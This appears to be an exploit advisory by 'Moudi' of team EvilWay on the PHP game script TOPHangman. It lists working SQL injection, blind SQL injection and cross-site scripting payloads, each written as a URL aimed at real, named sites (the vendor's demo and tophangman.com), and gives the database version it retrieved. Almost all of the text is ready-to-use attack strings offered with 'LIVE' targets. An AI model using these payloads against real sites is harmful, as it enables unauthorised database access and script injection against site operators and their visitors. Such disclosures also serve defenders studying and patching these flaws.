TOPHangman suffers from remote SQL injection and cross site scripting vulnerabilities.
d091cd1ea1b5f2f84da81c762e97b35f84ebbad41e7c59f4df8c706c71ff3fb6
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] TOPHangman Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ TOPHangman ]
[»] Language: [ PHP ]
[»] Download: [ https://www.phpscriptsnow.com/product_info.php?cPath=21&products_id=43 ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ $19.99 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : SQL INJECTION vulnerability ]===
[»] https://www.site.com/patch/index.php?letters=A&n=[SQL]
[»] https://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=null+union+select+1,version()--
[»] https://tophangman.com/index.php?letters=A&n=null+union+select+1,version()--
RESULT : 5.0.67
===[ Exploit + LIVE : BLIND SQL vulnerability ]===
[»] https://www.site.com/patch/index.php?letters=A&n=[BLIND]
[»] https://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=5 TRUE
https://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=4 FALSE
https://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=1%20and%201=1+union+select+1,version()--
SO MYSQL: V5
===[ Exploit XSS + LIVE : vulnerability ]===
[»] https://www.site.com/patch/index.php?letters=[XSS]
[»] https://www.phpscriptsnow.com/demo/hangman/index.php?letters=1>"><ScRiPt %0A%0D>alert(308637108657)%3B</ScRiPt>&n=601
[»] https://tophangman.com/index.php?letters=1>"><ScRiPt %0A%0D>alert(308637108657)%3B</ScRiPt>&n=601
Author: Moudi
###########################################################################